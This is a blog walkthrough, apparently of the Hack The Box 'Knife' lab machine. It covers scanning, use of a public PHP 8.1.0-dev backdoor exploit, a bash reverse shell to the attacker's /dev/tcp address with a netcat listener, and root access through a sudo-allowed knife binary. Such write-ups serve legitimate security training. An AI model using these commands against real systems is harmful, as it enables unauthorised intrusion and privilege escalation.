First, as always, I edit the hosts file so that I don’t have to remember the IP of the room.
bash β Lukas Blog - Time for some coffee
ββ[root@htb-sknjhnbkwa]β[/home/nobrac]
ββββΌ #cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot
10.129.215.155 knife.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-sknjhnbkwa htb-sknjhnbkwa.htb-cloud.com
I then perform an NMAP scan.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ nmap knife.htb -vv -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 11:08 CDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating Ping Scan at 11:08
Scanning knife.htb (10.129.215.155) [4 ports]
Completed Ping Scan at 11:08, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:08
Scanning knife.htb (10.129.215.155) [1000 ports]
Discovered open port 22/tcp on 10.129.215.155
Discovered open port 80/tcp on 10.129.215.155
Completed SYN Stealth Scan at 11:08, 0.20s elapsed (1000 total ports)
Initiating Service scan at 11:08
Scanning 2 services on knife.htb (10.129.215.155)
Completed Service scan at 11:08, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.215.155.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.35s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.04s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Nmap scan report for knife.htb (10.129.215.155)
Host is up, received reset ttl 63 (0.0087s latency).
Scanned at 2024-07-15 11:08:06 CDT for 6s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjEtN3+WZzlvu54zya9Q+D0d/jwjZT2jYFKwHe0icY7plEWSAqbP+b3ijRL6kv522KEJPHkfXuRwzt5z4CNpyUnqr6nQINn8DU0Iu/UQby+6OiQIleNUCYYaI+1mV0sm4kgmue4oVI1Q3JYOH41efTbGDFHiGSTY1lH3HcAvOFh75dCID0564T078p7ZEIoKRt1l7Yz+GeMZ870Nw13ao0QLPmq2HnpQS34K45zU0lmxIHqiK/IpFJOLfugiQF52Qt6+gX3FOjPgxk8rk81DEwicTrlir2gJiizAOchNPZjbDCnG2UqTapOm292Xg0hCE6H03Ri6GtYs5xVFw/KfGSGb7OJT1jhitbpUxRbyvP+pFy4/8u6Ty91s98bXrCyaEy2lyZh5hm7MN2yRsX+UbrSo98UfMbHkKnePg7/oBhGOOrUb77/DPePGeBF5AT029Xbz90v2iEFfPdcWj8SP/p2Fsn/qdutNQ7cRnNvBVXbNm0CpiNfoHBCBDJ1LR8p8k=
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
| 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1002 (40.132KB)
Ports 22 and 80 are open. So I try to access the website.
I use the Wappalyzer add-on to check how the website is structured. The site runs on Ubuntu with an Apache web server and PHP 8.1.0.
I then use Searchsploit to check whether there are any useful exploits for PHP 8.1.0.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ searchsploit PHP 8.1.0
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
autonomous lan party 0.98.1.0 - Remote File I | php/webapps/1654.txt
Composr-CMS Version <=10.0.39 - Authenticated | php/webapps/51060.txt
Concrete5 CMS 8.1.0 - 'Host' Header Injection | php/webapps/41885.txt
Concrete5 CMS < 8.3.0 - Username / Comments E | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery ( | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalg | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalg | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalg | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Serv | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Serv | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remo | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Exec | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple V | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Trav | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0. | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multip | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < | php/webapps/45083.rb
Micro Focus Secure Messaging Gateway (SMG) < | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vuln | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Exe | php/webapps/49933.py
PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL I | php/webapps/18148.pl
PHP-Nuke 8.1.0.3.5b - Remote Command Executio | php/webapps/14319.pl
PHP-Nuke 8.1.0.3.5b (Your_Account Module) - B | php/webapps/14320.pl
Plesk < 9.5.4 - Remote Command Execution | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory T | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary F | php/webapps/41272.txt
ScriptCase 8.1.053 - Multiple Vulnerabilities | php/webapps/40791.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Mult | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Cod | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Mu | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 57 | php/webapps/46815.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
I then copy the exploit βUser Agentβ RCE (49933.py) into my current directory and execute it. A shell opens directly to the target system.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ cp /usr/share/exploitdb/exploits/php/webapps/49933.py .
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ ls
49933.py Desktop Downloads my_data Public Videos
cacert.der Documents Music Pictures Templates
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ python3 49933.py
Enter the full host url:
http://knife.htb
Interactive shell is opened on http://knife.htb
Can't acces tty; job crontol turned off.
$
Unfortunately, the shell is not really stable. For this reason, I start Netcat in a separate terminal and manually enter the command for a reverse shell.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ python3 49933.py
Enter the full host url:
http://knife.htb
Interactive shell is opened on http://knife.htb
Can't acces tty; job crontol turned off.
$ bash -c "bash -i >& /dev/tcp/10.10.14.76/9001 0>&1"
Now I have a more stable reverse shell on my separate terminal with Netcat.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-sknjhnbkwa]β[~]
ββββΌ [β
]$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.215.155] 48340
bash: cannot set terminal process group (899): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
The user flag can then be found relatively quickly.
bash β Lukas Blog - Time for some coffee
ββ[eu-dedivip-1]β[10.10.14.76]β[nobrac@htb-aastmc1dve]β[~]
ββββΌ [β
]$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.214.39] 51830
bash: cannot set terminal process group (889): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ cd
cd
james@knife:~$ ls
ls
user.txt
james@knife:~$ cat user.txt
cat user.txt
32dcd2a6c5b76d21dfa21c19b0bca263
james@knife:~$
I then use the command βsudo -lβ to check what our user may be able to execute with sudo permissions. Here we find a binary with the name βknifeβ.
bash β Lukas Blog - Time for some coffee
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:/$
The binary has a help parameter, which I use to display all possible options.
bash β Lukas Blog - Time for some coffee
james@knife:/$ /usr/bin/knife --help
/usr/bin/knife --help
Chef Infra Client: 16.10.8
Docs: https://docs.chef.io/workstation/knife/
Patents: https://www.chef.io/patents
Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.
Available subcommands: (for details, knife SUB-COMMAND --help)
We can take advantage of the authorizations and open a root shell with it and then use it to display the root flag.
bash β Lukas Blog - Time for some coffee
james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
c0a46841b0e165d0fe6befdb7753c2e5
That’s it for the room.
